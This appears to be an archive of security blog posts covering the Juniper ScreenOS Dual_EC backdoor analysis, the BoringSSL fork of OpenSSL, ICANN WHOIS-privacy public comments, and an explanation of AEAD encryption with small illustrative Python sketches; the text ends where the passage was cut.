  • 5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B: This is the b value for the P-256 equation.
  • 6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296: This is the x coordinate for the standard generator of P-256—the starting point for operations on the curve.
  • FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551: This is the number of points on P-256.

So all the values just before the changed one are constants for P-256, suggesting that the changed value is cryptographic too. The obvious, missing value would be the y coordinate for the standard generator. One possibility was that the attack put in the wrong y value. This could put the generator on the wrong curve, say a weaker curve that shares most of the same parameters as P-256 but with a different value for b. But the curve that would have resulted, while weaker, wasn't real-time-passive-decryption weak. Also the replacement value in the fixed version wasn't the standard y value either.

Ralf-Philipp Weinmann was looking at the code itself and found:

That means that the changed value is an x coordinate and that the code was calculating the y value from it given the curve equation. Thus it would only need the x values and the points would always be on the correct curve. So perhaps it's a public key for something?

Changing a public key could easily be a big backdoor, but recall that the result here is somehow passive decryption of VPN traffic. It's unclear how changing a public key could result in passive decryption.

Oh dear. To explain: “EC PRNG” suggests that the value might be a constant in an elliptic-curve based pseudo-random number generator. That could certainly explain how passive decryption of VPN traffic was possible because it brings up memories of Dual-EC. Dual-EC was an NSA effort to introduce a backdoored pseudo-random number generator (PRNG) that, given knowledge of a secret key, allowed an attacker to observe output from the RNG and then predict its future output. If an attacker can predict the output of the PRNG then they can know the keys that one or both sides of a VPN connection will choose and decrypt it. (For more details, see the research paper.)

Indeed, it quickly came to light that Juniper have a page where they say that the VPN devices in question here “do utilize Dual_EC_DRBG, but do not use the pre-defined points cited by NIST”. In short, they used a backdoored RNG but changed the locks. Then this attack might be explained by saying that someone broke in and changed the locks again.

We're not sure that's actually what happened, but it seems like a reasonable hypothesis at this point. If it's correct, this is fairly bananas. Dual-EC is not a reasonable RNG: it's massively larger, slower and more complex than standard RNGs. Its output isn't even very uniform. Huge compromises were made in its design in order to meet its primary objective: to be a NOBUS, passive backdoor. (“NOBUS” is an intelligence community term for “nobody but us”, i.e. other parties shouldn't be able to use the backdoor.) Why would it be used in ScreenOS in the first place?

Again, assuming this hypothesis is correct then, if it wasn't the NSA who did this, we have a case where a US government backdoor effort (Dual-EC) laid the groundwork for someone else to attack US interests. Certainly this attack would be a lot easier given the presence of a backdoor-friendly RNG already in place. And I've not even discussed the SSH backdoor which, as Wired notes, could have been the work of a different group entirely. That backdoor certainly isn't NOBUS—Fox-IT claim to have found the backdoor password in six hours.

BoringSSL

We recently switched Google's two billion line repository over to BoringSSL, our fork of OpenSSL. This means that BoringSSL is now powering Chromium (on nearly all platforms), Android M and Google's production services. For the first time, the majority of Google's products are sharing a single TLS stack and making changes no longer involves several days of work juggling patch files across multiple repositories.

This is a big positive for Google and I'm going to document some of the changes that we've made in BoringSSL in this post. I am not saying that people should be ditching OpenSSL and switching to BoringSSL. For Linux distributions that doesn't even make sense because we've removed too much for many applications to run unaltered and, without linker trickery, it's not possible to have both OpenSSL and BoringSSL in the same process because their symbols will collide. Even if you're in the position of shipping your own TLS stack with your code, you should still heed the warnings in the README well.

OpenSSL have considerably improved their processes since last April, which is great and important because huge swathes of the Internet will continue to depend on it. BoringSSL started before those changes but, even taking them into consideration, I'm still happy with my decision to fork. (But note that Google employs OpenSSL team members Emilia Käsper, Bodo Möller and Ben Laurie and contributes monetarily via the Core Infrastructure Initiative, so we haven't dropped our support of OpenSSL as a project.)

With that in mind, I'm going to mention some of the cleanups that we've done in BoringSSL from the lowest level, upwards. While most people should continue to use OpenSSL, there are lots of developers outside of Google who work on Chromium and Android and thus this document shouldn't be internal to Google. This post may seem critical of OpenSSL, but remember that many of these changes are possible because we only have to worry about Google's needs—we have an order of magnitude fewer platforms and configurations to support than OpenSSL and we don't keep any ABI compatibility. We also have the superpower of being able to change, where needed, the code that calls BoringSSL, so you can't really compare the two.

The “we”, above, is primarily myself and my colleagues David Benjamin and Matt Braithwaite. But BoringSSL is open source and Brian Smith has clocked up 55 patches and we've also had contributions from Opera and CloudFlare. (Brian's number would be higher if I had had more time to review his pending changes in the past couple of weeks.)

“Forking”

Generally when people say “forking” they mean that they took a copy of the code and started landing patches independently of the original source. That's not what we did with BoringSSL. Rather than start with a copy, I started with an empty directory and went through OpenSSL function-by-function, reformatting, cleaning up (sometimes discarding) and documenting each one. So BoringSSL headers and sources look like this rather than this. The comments in BoringSSL headers can be extracted by a tool to produce documentation of a sort. (Although it could do with a make-over.)

(Clang's formatting tool and its Vim integration are very helpful! It's been the biggest improvement in my code-editing experience in many years.)

For much of the code, lengths were converted from ints to size_ts and functions that returned one, zero or minus one were converted to just returning one or zero. (Not handling a minus one return value is an easy and dangerous mistake.)
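To make the minus-one hazard concrete, here is a minimal sketch. It is in Python rather than C, but the truthiness rule is the same: any non-zero value counts as true. The function names are hypothetical and are not BoringSSL or OpenSSL APIs.

```python
# Hypothetical legacy-style API: 1 = valid, 0 = invalid, -1 = internal error.
def legacy_verify(signature: bytes, expected: bytes) -> int:
    if not signature:
        return -1  # stands in for a malformed input or allocation failure
    return 1 if signature == expected else 0


# Cleaned-up style: only 1 (success) or 0 (any kind of failure).
def strict_verify(signature: bytes, expected: bytes) -> int:
    return 1 if legacy_verify(signature, expected) == 1 else 0


def naive_caller(verify, signature: bytes, expected: bytes) -> bool:
    # The easy mistake: treating any non-zero result as success.
    return bool(verify(signature, expected))


# With the legacy convention, an internal error is accepted as a valid signature.
error_accepted_by_legacy = naive_caller(legacy_verify, b"", b"good")
error_accepted_by_strict = naive_caller(strict_verify, b"", b"good")
```

With the one-or-zero convention, even the careless caller rejects the error case, which is the point of the conversion.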

I didn't always get everything right: sometimes I discarded a function that we later found we actually needed or I changed something that, on balance, wasn't worth the changes required in other code. Where possible, code that we've needed to bring back has gone into a separate section called “decrepit” which isn't built in Chromium or Android.

But large amounts of OpenSSL could simply be discarded given our more limited scope. All the following were simply never copied into the main BoringSSL: Blowfish, Camellia, CMS, compression, the ENGINE code, IDEA, JPAKE, Kerberos, MD2, MDC2, OCSP, PKCS#7, RC5, RIPE-MD, SEED, SRP, timestamping and Whirlpool. The OpenSSL that we started from has about 468,000 lines of code but, today, even with the things that we've added (including tests) BoringSSL is just 200,000. Even projects that were using OpenSSL's OPENSSL_NO_x defines to exclude functionality at compile time have seen binary sizes drop by 300KB when switching to BoringSSL.

Some important bits of OpenSSL are too large to bite off all at once, however. The SSL, ASN.1 and X.509 code were “forked” in the traditional sense: they were copied with minimal changes and improved incrementally. (Or, in the case of ASN.1 and X.509, left alone until they could be replaced completely.)

The lowest-levels

OpenSSL has a confusing number of initialisation functions. Code that uses OpenSSL generally takes a shotgun approach to calling some subset of OpenSSL_add_all_algorithms, SSL_library_init, ERR_load_crypto_strings and the deprecated SSLeay aliases of the same. BoringSSL doesn't need any of them; everything works immediately and the errors don't print out funny just because you forgot to load the error strings. If, like Chromium, you care about avoiding static initialisation (because every disk seek to load pages of code delays displaying the window at startup) then you can build with BORINGSSL_NO_STATIC_INITIALIZER and initialise the library when you need to with CRYPTO_library_init. But the vast majority of code just wants to avoid having to think about it. In the future, we would like to move to an automatic lazy-init which would solve even Chromium's needs.

OpenSSL and BoringSSL are often built into shared libraries, but OpenSSL doesn't have any visibility annotations. By default symbols are not hidden and ELF requires that any non-hidden symbols can be interposed. So if you look at libcrypto.so in a Linux distribution you'll see lots of internal functions polluting the dynamic symbol table and calls to those functions from within the library have to indirect via the PLT. BoringSSL builds with hidden visibility by default so calls to internal functions are direct and only functions marked OPENSSL_EXPORT are included in the dynamic symbol table.

Multi-threaded code is common these days but OpenSSL requires that you install callbacks to lock and unlock a conceptual array of locks. This trips up people who now take thread-safety to be a given, and can also mean that contention profiling shows a large, opaque amount of contention in the locking callback with no hint as to the real source. BoringSSL has a native concept of locks so is thread-safe by default. It also has “once” objects, atomic reference counting and thread-local storage, which eliminates much of the need for locking in the first place.

Errors

OpenSSL has a fairly unique method of handling errors: it pushes errors onto a per-thread queue as the stack unwinds. This means that OpenSSL errors can generally give you something like a stack trace that you might expect from gdb or a Python exception, which is definitely helpful in some cases. For contrast, NSS (Mozilla's crypto library) uses a more traditional, errno-like system of error codes. Debugging an NSS error involves looking up the numeric error code and then grepping the source code to find all the places where that error code can be set and figuring out which triggered this time.

However, this single error-code system is better for programmatic use. Code that tries to do something with OpenSSL errors (other than dumping them for human debugging) tends to look only at the first (i.e. deepest) error on the queue and tries to match on the reason or even function code. Thus changing the name of even internal functions could break calling code because these names were implicitly exported by the error system. Adding errors could also break code because now a different error could be first in the queue. Lastly, forgetting to clear the error queue after a failed function is very easy to do and thus endemic.

So BoringSSL no longer saves functions in the error queue: they all appear as OPENSSL_internal, which saved about 15KB of binary size alone. As a bonus, we no longer need to run a script every time we add a new function. The file name and line number are still saved but, thankfully, I've never seen code try to match line numbers from the error queue. Trying to match on reason codes is still problematic, but we're living with it for now. We also have no good answer for forgetting to clear the error queue. It's possible that we'll change things in the future to automatically clear the error queue when calling most functions as, now that we're using thread-local storage, that'll no longer cause servers to burst into a flaming ball of lock contention. But we've not done that yet.

Parsing and serialisation

OpenSSL's parsing and serialisation involves a lot of incrementing pointers with single-letter names. BoringSSL drags this firmly into the 1990's with functions that automatically check bounds for parsing and functions that automatically resize buffers for serialisation. This code also handles parsing and serialising ASN.1 in an imperative fashion and we're slowly switching over to these functions because the OpenSSL ASN.1 code is just too complicated for us.
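As a rough illustration of the idea (not of BoringSSL's actual API), here is a sketch of a bounds-checked reader and an auto-growing builder. The class and method names are hypothetical and Python stands in for C. The point is only that every read checks the remaining length, and every length prefix is written by the builder rather than by hand.

```python
class Reader:
    """Bounds-checked cursor over a byte string (hypothetical names)."""

    def __init__(self, data: bytes):
        self._data = data
        self._pos = 0

    def remaining(self) -> int:
        return len(self._data) - self._pos

    def get_bytes(self, n: int) -> bytes:
        # Every read goes through this single bounds check.
        if n < 0 or n > self.remaining():
            raise ValueError("truncated input")
        out = self._data[self._pos:self._pos + n]
        self._pos += n
        return out

    def get_u8(self) -> int:
        return self.get_bytes(1)[0]

    def get_u16(self) -> int:
        return int.from_bytes(self.get_bytes(2), "big")

    def get_u16_length_prefixed(self) -> "Reader":
        # Returns a child reader that cannot see past the prefixed body.
        return Reader(self.get_bytes(self.get_u16()))


class Builder:
    """Serialiser whose buffer grows as needed (hypothetical names)."""

    def __init__(self):
        self._buf = bytearray()

    def add_u8(self, value: int) -> None:
        self._buf += value.to_bytes(1, "big")  # raises if out of range

    def add_u16_length_prefixed(self, body: bytes) -> None:
        if len(body) > 0xFFFF:
            raise ValueError("body too long for a 16-bit length")
        self._buf += len(body).to_bytes(2, "big") + body

    def finish(self) -> bytes:
        return bytes(self._buf)


# Round trip: a one-byte type followed by a length-prefixed body.
builder = Builder()
builder.add_u8(22)
builder.add_u16_length_prefixed(b"hello")
wire = builder.finish()

reader = Reader(wire)
record_type = reader.get_u8()
body = reader.get_u16_length_prefixed().get_bytes(5)
```

A truncated input fails at the point of the read with a clear error, instead of walking a pointer off the end of the buffer.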

But I should note that OpenSSL's master branch now uses some similar parsing functions for parsing TLS structures at least. I've no idea whether that was inspired by BoringSSL, but it's great to see.

Random number generation

Random number generation in OpenSSL suffers because entropy used to be really difficult. There were entropy files on disk that applications would read and write, timestamps and PIDs would be mixed into entropy pools and applications would try other tricks to gather entropy and mix it into the pool. That has all made OpenSSL complicated.

BoringSSL just uses urandom—it's the right answer. (Although we'll probably do it via getrandom rather than /dev/urandom in the future.) There are no return values that you can forget to check: if anything goes wrong, it crashes the address space.

For the vast majority of code, that's all that you need to know, although there are some concessions to performance in the details:

TLS servers that are pushing lots of AES-CBC need the RNG to be really fast because each record needs a random IV. Because of this, if BoringSSL detects that the machine supports Intel's RDRAND instruction, it'll read a seed from urandom, expand it with ChaCha20 and XOR entropy from RDRAND. The seed is thread-local and refreshed every 1024 calls or 1MB output, whichever happens first.

Authenticated Encryption

Handing people a block cipher and hash function and expecting them to figure out the rest does not work. Authenticated Encryption is much closer to being reasonable and BoringSSL promotes it where possible. One very pleasing BoringSSL tale is that I handed that header file to a non-crypto developer and they produced secure code, first time. That would not have happened had I pointed them at EVP_CIPHER.

There is more to be done here as I've talked about before: we need nonce-misuse-resistant primitives and solutions for large files but what we have now is a significant improvement and the foundations for that future work are now in place.

SSL/TLS

As I mentioned, the SSL/TLS code wasn't reworked function-by-function like most of BoringSSL. It was copied whole and incrementally improved, predominantly by David Benjamin. I'm really happy with what he's managed to do with it.

At the small scale, most of the parsing and serialisation is now using the safe functions that I covered above. (Changes to convert most of the remaining pointer-juggling code are in my review queue.) TLS extensions are now a bit saner and no longer handled with huge switch statements. Support for SSLv2, DSS, SRP and Kerberos has all been dropped. The header file actually has comments.

Some important, small scale cleanups are less obvious. The large number of “functions” that were actually macros around ctrl functions (that bypassed the type system) are now real functions. In order to get TLS 1.0–1.2 you no longer use the ridiculously named SSLv23_method and then disable SSLv2 and SSLv3 by setting options on the SSL_CTX, rather you use TLS_method and control the versions by setting a minimum and maximum version.

There is lots more that I could mention like that.

At the larger scale, the buffer handling code has been substantially improved and the TLS code now does symmetric crypto using the AEAD interface, which cleanly partitions concerns that previously leaked all over the SSL code. We've also rewritten the version negotiation code so it no longer preprocesses the ClientHello and fiddles with method tables to use the correct version. This avoids some duplicated code and session resumption bugs and OpenSSL has since done a similar rewrite for 1.1.0. To solve a particular problem for Chrome, we've added some support for asynchronous private key operations so that slow smartcards don't block the network thread. Much of the DTLS logic has also been rewritten or pruned.

Perhaps most importantly, the state machine is much reduced. Renegotiation has been dropped except for the case of a TLS client handling renegotiation from a server while the application data flow has stopped, and even that is disabled by default. The DTLS code (a source of many bugs) is much saner in light of this.

Testing

OpenSSL has always had decent test coverage of lower-level parts like hash functions and ciphers, but testing of the more complex SSL/TLS code has been lacking. Testing that code is harder because you need to be able to produce sufficiently correct handshakes to get close to its edge cases, but you don't want to litter your real code with dozens of options for producing incorrect outputs in order to hit them. In BoringSSL, we've solved this by using a copy of Go's TLS stack for testing and we've littered it with such options. Our tests also stress asynchronous resume points across a range of handshakes. We wrote partial DTLS support in Go to test DTLS-only edge cases like reassembly, replay and retransmission. Along the way, we even discovered one of OpenSSL's old bug workarounds didn't work, allowing both projects to shed some code.

In C, any malloc call may fail. OpenSSL attempts to handle this, but such code is error-prone and rarely tested. It's best to use a malloc which crashes on failure, but for the benefit of consumers who can't, we have a "malloc test" mode. This runs all tests repeatedly, causing each successive allocation to fail, looking for crashes.
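The shape of such a test mode can be sketched as follows. This is an illustration in Python with hypothetical names, not BoringSSL's test harness: an allocator fails exactly the N-th allocation, and the driver re-runs the operation with N = 0, 1, 2, … until a run completes without the injected failure firing.

```python
class FailingAllocator:
    """Fails exactly one allocation: the one whose index equals fail_at."""

    def __init__(self, fail_at: int):
        self.fail_at = fail_at
        self.count = 0
        self.triggered = False

    def alloc(self, size: int) -> bytearray:
        index = self.count
        self.count += 1
        if index == self.fail_at:
            self.triggered = True
            raise MemoryError(f"injected failure at allocation {index}")
        return bytearray(size)


def code_under_test(allocator: FailingAllocator) -> int:
    """Hypothetical operation that allocates three buffers.

    Returns 1 on success and 0 on (cleanly handled) failure.
    """
    try:
        a = allocator.alloc(16)
        b = allocator.alloc(32)
        c = allocator.alloc(64)
    except MemoryError:
        return 0
    return 1 if len(a) + len(b) + len(c) == 112 else 0


def malloc_test(operation) -> int:
    """Fail allocation 0, then 1, ... until no injected failure fires.

    Returns how many runs had a failure injected. Any unexpected exception
    (the analogue of a crash) propagates out and fails the test.
    """
    fail_at = 0
    while True:
        allocator = FailingAllocator(fail_at)
        result = operation(allocator)
        if not allocator.triggered:
            if result != 1:
                raise AssertionError("operation failed without an injected fault")
            return fail_at
        if result != 0:
            raise AssertionError("operation claimed success despite a failed allocation")
        fail_at += 1


injected_runs = malloc_test(code_under_test)
```

Because the loop stops only once a run makes fewer allocations than the failure index, every allocation site on the exercised path is failed at least once.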

We now have 1,139 TLS tests which gives us 70% coverage of the TLS code—still better than any other TLS library that we've used.

The future

Now that we've done the task of aligning Google around BoringSSL, we'll hopefully be able to turn a little bit more attention to some feature work. Support for the IETF-approved ChaCha20-Poly1305 is coming soon. (Brian Smith has a change waiting for me.) Curve25519 and Ed25519 support are likely too. Next year, we will probably start on TLS 1.3 support.

But more cleanups are probably more important. The big one is the elimination of the ASN.1 and X.509 code in many cases. If you recall, we imported that code whole without cleanups and it hasn't been touched since. We've been incrementally replacing uses of the ASN.1 code with the new CBS and CBB functions but X.509 remains as a substantial user. We're not going to be able to drop that code completely because too much expects the X.509 functions to be available for reading and writing certificates, but we can make it so that the rest of the code doesn't depend on it. Then we can put it in a separate library and drop in a new certificate verification library that some of my Chromium colleagues are writing. Most users of BoringSSL will then, transparently, end up using the new library.

In the SSL code, the SSL object itself is a mess. We need to partition state that's really needed for the whole connection from state that can be thrown away after the handshake from state that can be optionally discarded after the handshake. That will save memory in servers as well as improving the clarity of the code. Since we don't have ABI compatibility, we can also reorder the structs to pack them better.

Lastly, we need to make fuzzing part of our process. Michał Zalewski's AFL has substantially improved the state of fuzzing but, whether we're using AFL or LibFuzzer, it's still a one-off for us. It should be much more like our CI builders. So should running clang-analyzer.

(David Benjamin contributed to this post.)

The ICANN Public Comments on WHOIS Privacy

ICANN is currently considering a proposal that “domains used for online financial transactions for commercial purpose should be ineligible for [WHOIS] privacy and proxy registrations” [PDF]. Given the vagueness around what would count as “commercial purpose” (tip jars? advertising? promoting your Kickstarter?) and concerns that some commercial sites are for small, home-run businesses, quite a lot of people are grumpy about this.

ICANN has a public comment period on this document until July 7th and what's interesting is that the comments (those that were emailed at least) are all in a mailing list archive. When you submit to the comment address (comments-ppsai-initial-05may15@icann.org) you receive a confirmation email with a link that needs to be followed and quite a clear statement that the comments are public, so I think that this is deliberate.

I was curious what the comments box on this sort of topic is full of so did a quick analysis. The comment period doesn't close until July 7th so obviously I'm missing a couple of days worth of responses, but it was a two month comment period so that doesn't seem too bad.

When I checked there were 11,017 messages and 9,648 (87.6%) of them were strongly based on the Respect Our Privacy form letter. Several hundred additional messages included wording from it so I think that campaign resulted in about 90% of messages. (And it's worth noting that the primary flow on that site is to call ICANN; of course, I've no data on the volume of phone calls that resulted.)

Another campaign site, Save Domain Privacy, has a petition and quite a few messages included its wording.

I classified all such messages as “against” and wrote a quick program to manually review the remaining messages that weren't trivially classifiable by string matching against those template messages.

  • Nine messages were so odd or confused that it's unclear what the writer believed.
  • Three messages were asking questions and not expressing an opinion.
  • Two messages were sufficiently equivocal that they didn't express a clear feeling in either direction.
  • One message was commenting on a different section of the document.
  • One message suggested that WHOIS privacy be available to all, but that it should have a significant (monetary) cost in order to discourage its use.

Many more messages were against and not based on either of the two template letters. That leaves 13 messages that expressed support for the proposal. (That's 0.12% for those who are counting, although I very much question how much meaning that number has.) They break down as follows:

  • Three messages suggested that private WHOIS registration was contrary to the openness of the Internet.
  • Three messages believed that shutting down sites that infringe copyright, or sell counterfeit trademarked goods, was a compelling reason.
  • Two writers believed that it was compelling, in general, to have contact details for websites. One of whom claimed to be a security researcher and wanted CERTs to have access to full WHOIS details.
  • Two messages suggested that it would hinder “cyber-bullies” and “pædophiles”, one of which described how hard it was to have a stalker's site shut down.
  • One author believed that being able to contact site owners in the event of a domain-name dispute was a compelling reason.
  • One message suggested that WHOIS privacy should be removed for all .com sites, but no others.
  • One commenter opined that the Internet is inherently hostile to privacy and thus those who want privacy should not register domains.

The comment period opened on May 5th, but between then and June 22nd there were only seven messages. However, the week of the 22nd brought 10,015 messages. Then the week of the 29th brought 995 more. So I think it's clear that, without significant outside promotion of these topics, almost nobody would have noticed this proposal.

AEADs: getting better at symmetric cryptography

I gave a talk a couple of weeks ago at the Yahoo Unconference. The conference was at the end of a particularly hard week for a bunch of reasons and I fear that the talk wasn't that great. (Afterwards I got home about 3pm and pretty much slept until the following morning.) This post is a, hopefully clearer, articulation of its contents.

I've been primarily working on getting Google products switched over to BoringSSL for a little over a year now. (Chromium is done on many platforms and AOSP switched recently.) This is necessary work, but it doesn't exactly lend itself to talk material. So the talk was titled “Lessons Learnt from Questions”: the idea being that smart developers at Google often ask lots of cryptography questions, and from those questions one can tell what is unclear in existing documentation. Points that are not obvious to smart non-experts are thus good topics to talk about because it's likely that lots of people are missing them.

I was aiming for an hour but, due to a misunderstanding in the weeks prior, I thought that I had to cut it down to 20 minutes, so I ditched all but one question:

“How do I encrypt lots of records given a per-user key?” —Anonymous developer

This question is about applying symmetric cryptography, which is the original motivation of all of cryptography. You would have thought that we would have figured it out by now, but we totally haven't.

In the 1990's it was common for cryptographers to produce block ciphers and hash functions, and then developers would be tasked with composing them. In the talk I stepped through the design of, and attacks on, the SSLv3/TLS CBC construction as a demonstration that plausible-sounding design features can lead to disaster, but I'm going to omit that here because it worked better live. (Phillip Rogaway tried to warn about these issues when SSL, IPSec, etc were being developed, but sadly the right people didn't listen to him.)

So, for quite a long time now, cryptographers have understood that block ciphers and hash functions are too low-level an abstraction and that the constructions themselves need to be studied and standardised. The result is called authenticated encryption (AE), and let's ponder what it might look like.

Obviously an AE function must take some plaintext and, if it's symmetric encryption, it must take a key. We also assume that it's going to take care of both confidentiality and authenticity for us, so not only will an attacker not be able to tell the plaintext from the ciphertext but, if the ciphertext is altered in any way, the decryption will fail cleanly. So let's experiment with a hypothetical SSH-like protocol that's trying to protect a series of key presses:

AE(key, plaintext) → ciphertext

AE(key, ‘h’) → α
AE(key, ‘e’) → β
AE(key, ‘l’) → γ
AE(key, ‘l’) → γ
AE(key, ‘o’) → δ

Oh no! The two l's in “hello” turned into the same ciphertext, so an attacker can see patterns in the input reflected in the ciphertext. That's pretty terrible; clearly we need our AE function to map the same plaintext to different ciphertexts. There's two ways that can happen: either the function is non-deterministic (i.e. it reads entropy internally as a hidden input), or we pass in some varying argument. Explicit is better than implicit so we choose the latter and add an argument called the nonce:

AE(key, plaintext, nonce) → ciphertext

AE(key, ‘h’, n0) → (α, n0)
AE(key, ‘e’, n1) → (β, n1)
AE(key, ‘l’, n2) → (γ, n2)
AE(key, ‘l’, n3) → (ɛ, n3)
AE(key, ‘o’, n4) → (δ, n4)

We assume that n0…4 are all distinct and thus the two l's now get different ciphertexts and patterns in the plaintext have been eliminated. Note that (for now) we need to include the nonce value with the ciphertext because it'll be needed when decrypting.

(As an aside: if you've done anything with cryptography before you've probably come across the acronym “IV”, for initialisation vector. Although not completely standard, I differentiate an IV and an nonce thus: an IV needs to be unpredictable while an nonce needs only to be distinct. The values 0, 1, 2, … are distinct, but they aren't unpredictable. For something like CBC mode, which needs an IV, using a counter would be unacceptable.)

We solved one problem but there's another thing that an evil attacker might do: reorder messages:

AE(key, ‘h’, n0) → (α, n0)                         (γ, n2)
AE(key, ‘e’, n1) → (β, n1)                         (δ, n4)
AE(key, ‘l’, n2) → (γ, n2)   …untrusted network…   (α, n0)
AE(key, ‘l’, n3) → (ɛ, n3)                         (ɛ, n3)
AE(key, ‘o’, n4) → (δ, n4)                         (β, n1)

All the ciphertexts on the right are perfectly valid and coupled with a valid nonce, but they end up decrypting to “lohle”—hardly what was intended.

There are two solutions to this. The first is to use an implicit nonce: don't transmit the nonce, just use a counter for each direction. Now, if a message is out of order, the receiver will attempt to decrypt it with the wrong nonce and it'll fail to decrypt. That works perfectly well for transport protocols like SSH and TLS because it's easy to keep a counter in those situations, but sometimes the problem isn't quite so synchronous. For these cases, one could include a sequence number or other context in the plaintext and that works fine, but it's a waste of space if the receiver already knew the information and just wanted to confirm it.

This motivates a common extension to authenticated encryption called authenticated encryption with associated data (AEAD). The associated data is another argument, of arbitrary length, which must be equal at the encryption and decryption ends:

AEAD(key, plaintext, nonce, ad) → ciphertext

AEAD(key, ‘h’, n0, 0) → (α, n0)
AEAD(key, ‘e’, n1, 1) → (β, n1)
AEAD(key, ‘l’, n2, 2) → (γ, n2)
AEAD(key, ‘l’, n3, 3) → (ɛ, n3)
AEAD(key, ‘o’, n4, 4) → (δ, n4)

In this example the associated data happens to be a counter, but it could be anything. The associated data isn't included in the ciphertext, but it must be identical when decrypting otherwise the decryption will fail. In other protocols it could equally well be some context denoting, say, the first or last record. This is the second solution to the reordering problem.
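The “hello” example can be played out with a toy AEAD. What follows is a sketch only: the construction (an HMAC-SHA256 keystream plus an HMAC tag), the 12-byte nonce length and all the function names are assumptions made for illustration. It is not a real or vetted AEAD and must not be used to protect anything.

```python
import hashlib
import hmac

NONCE_LEN = 12  # assumed fixed nonce size for this toy
TAG_LEN = 32    # HMAC-SHA256 tag appended to each ciphertext


def _prf(key: bytes, label: bytes, data: bytes) -> bytes:
    return hmac.new(key, label + data, hashlib.sha256).digest()


def _keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy keystream: PRF over (nonce, block counter). Not a real cipher.
    blocks = (length + 31) // 32
    stream = b"".join(_prf(key, b"enc", nonce + i.to_bytes(8, "big")) for i in range(blocks))
    return stream[:length]


def _tag(key: bytes, nonce: bytes, ad: bytes, body: bytes) -> bytes:
    # The length prefix on ad keeps the MAC input unambiguous.
    return _prf(key, b"mac", nonce + len(ad).to_bytes(8, "big") + ad + body)


def aead_seal(key: bytes, plaintext: bytes, nonce: bytes, ad: bytes = b"") -> bytes:
    if len(nonce) != NONCE_LEN:
        raise ValueError("bad nonce length")
    body = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return body + _tag(key, nonce, ad, body)


def aead_open(key: bytes, ciphertext: bytes, nonce: bytes, ad: bytes = b"") -> bytes:
    if len(nonce) != NONCE_LEN or len(ciphertext) < TAG_LEN:
        raise ValueError("decryption failed")
    body, tag = ciphertext[:-TAG_LEN], ciphertext[-TAG_LEN:]
    if not hmac.compare_digest(tag, _tag(key, nonce, ad, body)):
        raise ValueError("decryption failed")
    return bytes(c ^ k for c, k in zip(body, _keystream(key, nonce, len(body))))


def receive(key: bytes, messages) -> str:
    # The receiver supplies its own message counter as the associated data.
    return "".join(
        aead_open(key, ct, nonce, ad=bytes([i])).decode()
        for i, (ct, nonce) in enumerate(messages)
    )


key = bytes(range(32))
nonces = [i.to_bytes(NONCE_LEN, "big") for i in range(5)]
sent = [
    (aead_seal(key, ch.encode(), nonces[i], ad=bytes([i])), nonces[i])
    for i, ch in enumerate("hello")
]
reordered = [sent[2], sent[4], sent[0], sent[3], sent[1]]  # the "lohle" ordering
```

Calling receive(key, sent) recovers the text, while receive(key, reordered) raises on the very first message: its nonce is valid, but the receiver's counter no longer matches the associated data that it was sealed with.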

The associated data might seem quite a lot like an nonce. They both need to be presented at encryption and decryption time and they must both match for decryption to succeed, so why do we bother having both? Mostly because the associated data is free-form: you can have as much or as little of it as you like and you can repeat it etc. The requirements of an nonce are much stricter, in fact if you remember only one thing from this please remember this, which I'm calling The Law of AEADs:

Thou shall never reuse the same (key, nonce) pair, for all time. (With high probability.)

So, if you generate a random key and use it to encrypt a single message, it's ok to set the nonce to zero. If you generate a random key and encrypt a series of messages you must ensure that the nonce never repeats. A counter is one way to do this, but if you need to store that counter on disk then stop: the chances of you screwing up and reusing an nonce value are way too high in designs like that.

It would be nice if reusing an nonce just meant that the same plaintext would result in the same ciphertext. That's the least bad thing that an AEAD could do in that situation. However the reality is significantly worse: common AEADs tend to lose confidentiality of messages with a repeated nonce and authenticity tends to collapse completely for all messages. (I.e. it's very bad.) We like these common AEADs because they're fast, but you must have a solid story about nonce uniqueness. AEADs like AES-GCM and ChaCha20-Poly1305 fail in this fashion.
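The confidentiality half of that failure is easy to demonstrate. AES-GCM and ChaCha20-Poly1305 both encrypt by XORing the plaintext with a keystream derived from the key and nonce, so a repeated (key, nonce) pair means a repeated keystream. The sketch below uses a hash-based toy keystream as a stand-in for the real ciphers (an assumption made so that it needs only the standard library) and does not attempt to show the authenticity collapse.

```python
import hashlib


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy stand-in for a real stream cipher: hash of (key, nonce, counter).
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stream_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


key = b"\x01" * 32
nonce = bytes(12)            # the same nonce is (wrongly) used twice
p1 = b"attack at dawn"
p2 = b"retreat at ten"       # same length as p1

c1 = stream_encrypt(key, nonce, p1)
c2 = stream_encrypt(key, nonce, p2)

# The keystream cancels out: the attacker learns p1 XOR p2 without the key.
leak = xor(c1, c2)

# If one plaintext is known or guessable, the other falls out immediately.
recovered_p2 = xor(leak, p1)
```

Nothing here required the key, only two ciphertexts that shared a nonce.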

So what should you do when using a counter isn't trivially safe? One option is to generate the nonce at random and consider the probability of duplicates. AES-GCM takes a 96-bit nonce and NIST says that you can only encrypt 2^32 messages under a single key if using random nonces. This is because if you throw 2^32 balls at 2^96 buckets then you have roughly a 2^-33 chance of getting two in the same bucket and NIST drew the line there. That probability might seem either high or low to you. It's pretty small in absolute terms and, unlike a work factor, an attacker can't spend resources against it, but it's a very long way from the safety margins that we usually use in cryptography. So there are also functions like crypto_secretbox_xsalsa20poly1305 (from NaCl) that have a 192-bit nonce. The probabilities with random nonces are much more comforting at that size.
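The arithmetic behind those figures is the usual birthday approximation: with n random nonces drawn from N possible values, the chance of any collision is roughly n^2 / (2N). A small sketch, working in log2 to keep the numbers readable (the function names are mine):

```python
def log2_collision_probability(log2_messages: int, nonce_bits: int) -> int:
    """log2 of the approximate collision chance, using p ~= n^2 / (2N).

    n = 2**log2_messages random nonces, N = 2**nonce_bits possible values.
    The approximation only holds while the result is well below zero.
    """
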